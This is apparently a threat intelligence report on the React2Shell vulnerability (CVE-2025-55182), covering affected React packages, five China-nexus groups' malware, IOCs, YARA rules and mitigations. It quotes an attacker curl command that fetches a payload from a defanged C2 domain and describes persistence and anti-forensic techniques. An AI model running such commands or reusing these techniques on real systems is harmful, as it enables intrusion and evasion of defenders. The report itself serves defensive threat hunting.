.png){kind=logo}
CVE-2025-55182 React2Shell: Chinese APT Groups Exploit Critical React Server Components Vulnerability for Malware Delivery
- Rescana
- 20 hours ago
- 8 min read
Rescana Threat Intelligence Report: Google Sees 5 Chinese Groups Exploiting React2Shell (CVE-2025-55182) for Malware Delivery
Date: December 2025Prepared by: Rescana OSINT Cybersecurity Research TeamPrimary Sources: Google Threat Intelligence Group, AWS, SecurityWeek, NVD, Wiz, Trend Micro
Executive Summary
On December 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 ("React2Shell"), was publicly disclosed. Google Threat Intelligence Group (GTIG) and AWS have since observed at least five China-nexus threat clusters exploiting this vulnerability to deliver a range of malware, including tunneling tools, backdoors, and cryptominers. The attacks are global, with a focus on cloud infrastructure and web servers running vulnerable React/Next.js components.
Vulnerability Details
CVE:CVE-2025-55182
CVSS v3.x Score: 10.0 (Critical)
CVSS v4 Score: 9.3
Attack Vector: Unauthenticated attackers can send a single HTTP request to execute arbitrary code with the privileges of the web server process.
Exploit Availability: Multiple PoCs, including Unicode-obfuscated and in-memory web shell variants, are circulating. Some PoCs are non-functional or malicious.
Complete List of Affected Product Versions
The following React Server Component packages and versions are confirmed vulnerable to CVE-2025-55182:
react-server-dom-webpack
(versions: 19.0, 19.1.0, 19.1.1, 19.2.0)
react-server-dom-parcel
(versions: 19.0, 19.1.0, 19.1.1, 19.2.0)
react-server-dom-turbopack
(versions: 19.0, 19.1.0, 19.1.1, 19.2.0)
Note: The presence of these packages in a project is sufficient for exploitation, even if not directly used.
Exploitation in the Wild
China-Nexus Threat Groups
Google and AWS identified at least five China-nexus clusters exploiting React2Shell:
1. UNC6600 (Espionage)
Malware: MINOCAT tunneler
TTPs:
- Bash script creates hidden directory
$HOME/.systemd-utils
Kills
ntpclient
processes
Downloads and persists MINOCAT via cron, systemd, and shell config injection
MINOCAT is a 64-bit ELF with embedded Fast Reverse Proxy (FRP) client
2. UNC6586 (Espionage/Unknown)
Malware: SNOWLIGHT downloader (part of VSHELL backdoor)
TTPs:
Uses
curl
or
wget
to fetch and execute SNOWLIGHT
SNOWLIGHT retrieves further payloads from C2 (e.g.,
reactcdn.windowserrorapis[.]com
)
- Example command:
curl -fsSL -m180 https://reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com&p=443&t=tcp&a=l64&stage=true -o <filename>
3. UNC6588 (Espionage/Unknown)
Malware: COMPOOD backdoor
TTPs:
- Downloads COMPOOD masquerading as Vim via
wget
- Executes as
/tmp/vim "/usr/lib/polkit-1/polkitd --no-debug"
COMPOOD previously linked to China-nexus espionage in Taiwan, Vietnam, and China
4. UNC6603 (Cloud Infrastructure Targeting)
Malware: HISONIC backdoor (Go-based)
TTPs:
Uses Cloudflare Pages and GitLab for encrypted config retrieval
XOR-encoded config between markers
115e1fc47977812
and
725166234cf88gxx
Targets AWS and Alibaba Cloud in APAC
5. UNC6595 (VPS Targeting)
Malware: ANGRYREBEL.LINUX
TTPs:
- Installs as fake OpenSSH daemon in
/etc/
Uses timestomping and clears shell history for anti-forensics
Financially Motivated Actors
Malware: XMRig cryptominer
TTPs:
Downloads and executes
sex.sh
script to install XMRig
- Establishes persistence via systemd service
system-update-service
Indicators of Compromise (IOCs)
| Type | Value/Description | Associated Malware/Actor | |-----------|--------------------------------------------------------|----------------------------------| | Domain | reactcdn.windowserrorapis[.]com | SNOWLIGHT C2 | | IP | 82.163.22[.]139 | SNOWLIGHT C2 | | IP | 216.158.232[.]43 | Staging for sex.sh | | IP | 45.76.155[.]14 | COMPOOD C2/Payload | | SHA256 | df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540 | HISONIC sample | | SHA256 | 92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3 | HISONIC sample | | SHA256 | 0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 | ANGRYREBEL.LINUX | | SHA256 | 13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 | XMRIG Downloader (sex.sh) | | SHA256 | 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a | SNOWLIGHT sample | | SHA256 | 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 | MINOCAT sample |
MITRE ATT&CK Mapping
Initial Access: Exploit Public-Facing Application (T1190)
Execution: Command and Scripting Interpreter (T1059), Scheduled Task/Job (T1053)
Persistence: Boot or Logon Initialization Scripts (T1037), Systemd Service (T1543.002), Cron (T1053.003)
Defense Evasion: Masquerading (T1036), Timestomp (T1070.006), Clear Command History (T1070.003)
Command and Control: Application Layer Protocol (T1071), Web Service (T1102)
Impact: Resource Hijacking (T1496) [for cryptomining]
Exploit and PoC References
GitHub PoC Repository (ejpir) (Note: Validate code before use; some PoCs are non-functional or malicious)
YARA Rules (from Google GTIG)
MINOCAT:yara rule G_APT_Tunneler_MINOCAT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_modified = "2025-12-10" rev = "1" md5 = "533585eb6a8a4aad2ad09bbf272eb45b" strings: $magic = { 7F 45 4C 46 } $decrypt_func = { 48 85 F6 0F 94 C1 48 85 D2 0F 94 C0 08 C1 0F 85 } $xor_func = { 4D 85 C0 53 49 89 D2 74 57 41 8B 18 48 85 FF 74 } $frp_str1 = "libxf-2.9.644/main.c" $frp_str2 = "xfrp login response: run_id: [%s], version: [%s]" $frp_str3 = "cannot found run ID, it should inited when login!" $frp_str4 = "new work connection request run_id marshal failed!" $telnet_str1 = "Starting telnetd on port %d\n" $telnet_str2 = "No login shell found at %s\n" $key = "bigeelaminoacow" condition: $magic at 0 and (1 of ($decrypt_func, $xor_func)) and (2 of ($frp_str*)) and (1 of ($telnet_str*)) and $key }COMPOOD:yara rule G_Backdoor_COMPOOD_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_modified = "2025-12-11" rev = "1" md5 = "d3e7b234cf76286c425d987818da3304" strings: $strings_1 = "ShellLinux.Shell" $strings_2 = "ShellLinux.Exec_shell" $strings_3 = "ProcessLinux.sendBody" $strings_4 = "ProcessLinux.ProcessTask" $strings_5 = "socket5Quick.StopProxy" $strings_6 = "httpAndTcp" $strings_7 = "clean.readFile" $strings_8 = "/sys/kernel/mm/transparent_hugepage/hpage_pmd_size" $strings_9 = "/proc/self/auxv" $strings_10 = "/dev/urandom" $strings_11 = "client finished" $strings_12 = "github.com/creack/pty.Start" condition: uint32(0) == 0x464C457f and 8 of ($strings_*) }SNOWLIGHT:yara rule G_Hunting_Downloader_SNOWLIGHT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" date_created = "2025-03-25" date_modified = "2025-03-25" md5 = "3a7b89429f768fdd799ca40052205dd4" rev = 1 strings: $str1 = "rm -rf $v" $str2 = "&t=tcp&a=" $str3 = "&stage=true" $str4 = "export PATH=$PATH:$(pwd)" $str5 = "curl" $str6 = "wget" $str7 = "python -c 'import urllib" condition: all of them and filesize < 5KB }
Key References
Conclusion
CVE-2025-55182 (React2Shell) is being actively exploited by multiple China-nexus APT groups and financially motivated actors. The attacks are sophisticated, leveraging a range of malware and post-exploitation techniques. Organizations using React Server Components or Next.js should patch immediately, monitor for IOCs, and review system and network logs for signs of compromise.
For further assistance or threat intelligence services, contact Rescana.
Executive Summary
A critical remote code execution vulnerability, CVE-2025-55182 (commonly referred to as React2Shell), has been weaponized in the wild by at least five distinct China-nexus threat groups, as reported by Google Threat Intelligence Group and corroborated by multiple industry sources. The vulnerability affects several versions of React Server Components and related packages, enabling unauthenticated attackers to execute arbitrary code on vulnerable servers via a single HTTP request. The exploitation campaign is notable for its rapid adoption by advanced persistent threat (APT) actors, the diversity of malware payloads delivered—including tunneling tools, backdoors, and cryptominers—and the global scope of targeting, with a particular focus on cloud infrastructure and web-facing assets. Immediate patching and comprehensive threat hunting are strongly advised for all organizations utilizing affected React components.
Threat Actor Profile
The exploitation of React2Shell has been attributed to at least five China-nexus threat clusters, each exhibiting distinct tactics, techniques, and procedures (TTPs) and malware toolsets. These groups, tracked by Google and AWS as UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595, are primarily engaged in cyber espionage and infrastructure compromise. Their operations demonstrate a high degree of technical sophistication, including the use of custom tunneling malware (MINOCAT), advanced backdoors (COMPOOD, HISONIC), and anti-forensic techniques such as timestomping and shell history clearing. In addition to state-aligned actors, financially motivated groups have exploited the vulnerability to deploy cryptomining malware (XMRig), indicating broad criminal interest in the exploit.
Technical Analysis of Malware/TTPs
The exploitation chain begins with the delivery of a single, unauthenticated HTTP request to a vulnerable React Server Component endpoint. This request leverages the deserialization flaw in the affected packages—react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack (versions 19.0, 19.1.0, 19.1.1, and 19.2.0)—to achieve arbitrary code execution in the context of the web server process.
Once access is gained, threat actors deploy a variety of payloads:
MINOCAT (UNC6600) is a 64-bit ELF binary with embedded Fast Reverse Proxy (FRP) client functionality. It is typically installed via a bash script that creates a hidden directory ($HOME/.systemd-utils), terminates time synchronization processes (ntpclient), and establishes persistence through cron jobs, systemd services, and shell configuration file injection. MINOCAT enables covert tunneling of attacker traffic into the compromised environment.
SNOWLIGHT (UNC6586) is a lightweight downloader, often fetched using curl or wget commands. It retrieves additional payloads from command-and-control (C2) infrastructure such as reactcdn.windowserrorapis[.]com. The downloader is associated with the VSHELL backdoor family and is used to stage further implants or tools.
COMPOOD (UNC6588) masquerades as a legitimate binary (e.g., Vim) and is executed with parameters mimicking system processes. It is linked to prior espionage campaigns in East Asia and provides remote shell access, file exfiltration, and proxy capabilities.
HISONIC (UNC6603) is a Go-based backdoor that retrieves encrypted configuration data from public cloud services, including Cloudflare Pages and GitLab. The configuration is XOR-encoded and delimited by unique markers, complicating detection. HISONIC is tailored for cloud infrastructure targeting, particularly AWS and Alibaba Cloud assets.
ANGRYREBEL.LINUX (UNC6595) is a persistence-focused implant that installs itself as a fake OpenSSH daemon in /etc/, employs timestomping to evade forensic analysis, and clears shell history to hinder incident response.
Financially motivated actors have deployed XMRig cryptominer via a shell script (sex.sh), establishing persistence through a systemd service named system-update-service.
The exploitation ecosystem is further complicated by the proliferation of public and private proof-of-concept (PoC) exploits, some of which are obfuscated or contain embedded web shells, increasing the risk of opportunistic attacks.
Exploitation in the Wild
Within hours of public disclosure, exploitation of React2Shell was observed at scale. Google and AWS telemetry indicate that the five China-nexus clusters rapidly adapted their toolchains to leverage the vulnerability, targeting a wide array of internet-facing assets. The attacks are characterized by:
Automated scanning for vulnerable endpoints, often using custom reconnaissance scripts.
Immediate deployment of first-stage payloads (e.g., MINOCAT, SNOWLIGHT) to establish initial foothold and persistence.
Lateral movement and privilege escalation, facilitated by the deployment of backdoors and tunneling tools.
Use of anti-forensic measures, including timestomping, shell history clearing, and masquerading of malicious binaries as legitimate system processes.
Exfiltration of sensitive data and, in some cases, deployment of cryptomining software to monetize access.
The exploitation is not limited to high-profile targets; opportunistic attacks against smaller organizations and unmanaged cloud infrastructure have also been reported. The availability of multiple PoCs, including those with Unicode obfuscation and in-memory execution, has lowered the barrier to entry for less sophisticated actors.
Victimology and Targeting
The targeting profile for React2Shell exploitation is broad, encompassing organizations across North America, Europe, and the Asia-Pacific region. Sectors most affected include cloud service providers (AWS, Alibaba Cloud), managed service providers, technology companies, and any enterprise deploying React or Next.js applications with vulnerable server components. Notably, international VPS providers and general web infrastructure are also at risk, as are organizations in Taiwan, Vietnam, and China, reflecting the geopolitical interests of the identified threat clusters.
The attacks are not limited to large enterprises; small and medium-sized businesses with exposed React infrastructure are equally vulnerable. The diversity of malware payloads suggests both espionage and financially motivated objectives, with some actors focusing on data exfiltration and others on resource hijacking for cryptomining.
Mitigation and Countermeasures
Immediate action is required to mitigate the risk posed by CVE-2025-55182. Organizations should:
Upgrade all affected React Server Component packages to the latest patched versions (at least 19.0.1, 19.1.2, or 19.2.1; full coverage is provided by 19.2.2 or 19.2.3).
Audit all applications and dependencies for the presence of vulnerable react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages, even if not directly imported.
Deploy or update web application firewall (WAF) rules to detect and block exploitation attempts, leveraging managed rulesets from providers such as Google Cloud Armor.
Monitor network traffic for anomalous outbound connections, particularly to known C2 domains and IPs associated with SNOWLIGHT, COMPOOD, and MINOCAT.
Conduct threat hunting for indicators of compromise, including hidden directories (e.g.,
$HOME/.systemd-utils
), unauthorized process terminations, suspicious cron jobs, and systemd service modifications.
Utilize the provided YARA rules to scan for known malware samples on endpoints and servers.
Review system and application logs for evidence of exploitation, such as unexpected HTTP requests to React endpoints or execution of shell commands by the web server process.
Isolate and reimage compromised systems where necessary, and reset credentials for affected accounts.
References
Google Threat Intelligence Blog: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182
AWS Security Blog: https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
Trend Micro Analysis: https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html
Wiz Blog: https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182
SecurityWeek Coverage: https://www.securityweek.com/google-sees-5-chinese-groups-exploiting-react2shell-for-malware-delivery/
NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
GitHub PoC Repository (ejpir): https://github.com/ejpir/react2shell-poc
About Rescana
Rescana delivers advanced third-party risk management (TPRM) solutions, empowering organizations to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our platform leverages real-time threat intelligence, automated risk scoring, and deep visibility into vendor ecosystems, enabling proactive defense against emerging threats. For more information about how Rescana can help secure your organization’s digital assets and supply chain, we are happy to answer questions at ops@rescana.com.
